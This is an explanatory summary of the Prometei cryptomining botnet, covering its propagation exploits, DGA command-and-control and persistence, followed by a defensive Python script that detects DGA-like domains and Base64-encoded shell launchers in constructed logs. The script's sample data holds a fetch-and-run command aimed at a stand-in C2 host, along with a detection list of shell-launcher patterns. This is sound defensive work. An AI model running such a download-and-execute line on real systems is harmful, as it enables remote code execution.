Prometei is a sophisticated, modular malware family that operates as a botnet, primarily targeting both Windows and Linux systems for illicit cryptocurrency mining (focusing on Monero), credential theft, and other malicious activities. First identified in 2020, with evidence of earlier variants dating back to 2016, Prometei has evolved significantly, with its latest versions demonstrating advanced persistence, lateral movement, and evasion capabilities.
Modular Architecture
• Prometei is built from multiple independent modules, each responsible for specific tasks such as brute-forcing credentials, exploiting vulnerabilities, mining cryptocurrency, stealing data, and maintaining command-and-control (C2) communications.
• This design allows the botnet to adapt quickly: individual modules can be updated or replaced without disrupting the overall operation.
Cross-Platform Targeting
• Early versions focused on Windows, but since late 2020, Linux variants have become prominent, especially in recent campaigns.
• The malware is distributed as 64-bit ELF binaries for Linux and PE files for Windows, often packed with tools like UPX to evade detection.
Propagation and Infection Methods
• Prometei spreads by exploiting well-known vulnerabilities, including:
  • EternalBlue (SMB protocol exploit)
  • BlueKeep (RDP vulnerability)
  • Microsoft Exchange vulnerabilities (e.g., ProxyLogon, ProxyNotShell)
• It also uses brute-force attacks against RDP, SMB, and SSH services to gain initial access.
Command-and-Control (C2) Infrastructure
• Relies on a Domain Generation Algorithm (DGA) to dynamically generate domains for C2 communication, making it resilient against domain takedowns.
• Maintains persistence via scheduled tasks, services, and web shells (e.g., a PHP web shell served by Apache).
Self-Updating and Evasion
• Prometei can self-update its modules, allowing it to adapt to new security measures and evade detection.
• Uses obfuscation techniques, such as compressing payloads and encoding commands in Base64.
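Two of the traits above, the DGA-generated C2 domains and the Base64-encoded commands, leave traces that a defender can hunt for in ordinary telemetry. The script below is an added example written for this summary; it is not part of the original page and not tooling from any vendor, and it contains no real Prometei indicators. It runs two first-pass checks over constructed sample logs: a lexical DGA heuristic on DNS query names, and a scan of process command lines for Base64 tokens that decode to a shell launcher. The domains, host names, thresholds (MIN_LABEL_LEN, ENTROPY_THRESHOLD, VOWEL_RATIO_THRESHOLD) and the SHELL_HINTS list are all assumptions chosen for the example.

```python
import base64
import math
import re
from collections import Counter

# --- Constructed sample telemetry (assumption: none of this is a real IoC) ---

# Constructed DNS query log: two ordinary names and two random-looking ones of
# the kind a DGA produces.
DNS_LOG = """\
2024-05-01T10:00:01Z host=web01 query=updates.example.com type=A
2024-05-01T10:00:02Z host=web01 query=xk3fq9zpl2vb.com type=A
2024-05-01T10:00:03Z host=web01 query=mail.example.com type=A
2024-05-01T10:00:04Z host=web01 query=q7w2rt8yphdz.net type=A
"""

# Constructed command wrapped in Base64 by a "decode and pipe to sh" launcher.
# The host uses the reserved .invalid TLD so it can never resolve.
DECODED_CMD = "curl -s http://c2.example.invalid/a.sh | sh"
ENCODED_CMD = base64.b64encode(DECODED_CMD.encode()).decode()

# Constructed process-creation log. Line 2 carries the encoded launcher; line 4
# carries a hex digest that also fits the Base64 alphabet and must NOT be reported.
PROC_LOG = f"""\
host=web01 pid=4021 image=/bin/bash cmdline="bash -c ls /var/www"
host=web01 pid=4022 image=/bin/bash cmdline="bash -c echo {ENCODED_CMD} | base64 -d | sh"
host=web01 pid=4023 image=/usr/bin/php cmdline="php -r 'echo 1;'"
host=web01 pid=4024 image=/usr/bin/sha256sum cmdline="sha256sum 3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b"
"""

# --- DGA heuristic (thresholds are assumptions; tune against your own DNS data) ---
MIN_LABEL_LEN = 7
ENTROPY_THRESHOLD = 3.2      # bits per character of the registrable label
VOWEL_RATIO_THRESHOLD = 0.25  # human-chosen names rarely fall below this


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character (0.0 for an empty or single-symbol string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'example' for 'www.example.com'.
    Public-suffix handling (co.uk and friends) is deliberately omitted here."""
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def is_dga_like(domain: str) -> bool:
    """Flag a domain whose registrable label is long, high-entropy AND nearly
    vowel-free. Pronounceable DGAs slip through; this is a first-pass filter."""
    label = registrable_label(domain)
    if len(label) < MIN_LABEL_LEN:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= ENTROPY_THRESHOLD and vowel_ratio < VOWEL_RATIO_THRESHOLD


def flag_dga_queries(dns_log: str) -> list[str]:
    """Return every queried name in the log that is_dga_like() flags."""
    hits = []
    for line in dns_log.splitlines():
        m = re.search(r"query=(\S+)", line)
        if m and is_dga_like(m.group(1)):
            hits.append(m.group(1))
    return hits


# --- Base64-encoded command detection -----------------------------------------
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Substrings that mark decoded text as a launcher rather than harmless data (assumption).
SHELL_HINTS = ("| sh", "|sh", "| bash", "curl ", "wget ")


def decode_base64_tokens(cmdline: str) -> list[tuple[str, str]]:
    """Return (token, decoded_text) for each Base64-looking token in a command
    line that decodes cleanly to printable ASCII; everything else is skipped."""
    found = []
    for m in B64_TOKEN.finditer(cmdline):
        token = m.group(0)
        if len(token) % 4:          # strict Base64 is always a multiple of 4
            continue
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:          # binascii.Error and UnicodeDecodeError
            continue
        if text.isprintable():
            found.append((token, text))
    return found


def flag_encoded_commands(proc_log: str) -> list[tuple[str, str, str]]:
    """Return (pid, token, decoded_text) for command lines carrying a Base64
    token whose decoded form looks like a shell launcher."""
    hits = []
    for line in proc_log.splitlines():
        pid = re.search(r"pid=(\d+)", line)
        cmd = re.search(r'cmdline="([^"]*)"', line)
        if not (pid and cmd):
            continue
        for token, text in decode_base64_tokens(cmd.group(1)):
            if any(hint in text for hint in SHELL_HINTS):
                hits.append((pid.group(1), token, text))
    return hits


if __name__ == "__main__":
    for name in flag_dga_queries(DNS_LOG):
        print(f"DGA-like query: {name}")
    for pid, token, text in flag_encoded_commands(PROC_LOG):
        print(f"pid {pid}: Base64 token decodes to: {text}")
```

Both checks are intentionally cheap so they can run over bulk DNS and EDR process logs; treat a hit as a triage lead, not a verdict. The DGA heuristic requires both conditions at once so that long legitimate words (high entropy but normal vowel density) are not flagged, and the Base64 scan only reports tokens that decode to printable text containing a launcher pattern, which is why the hex digest on the last sample line is silently ignored.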
Symptoms of Infection
• Noticeable system slowdowns and overheating
• Unexpectedly high electricity bills (due to mining)
• Unrecognized processes or services running
• Persistent high network activity
• Rapid battery drain on laptops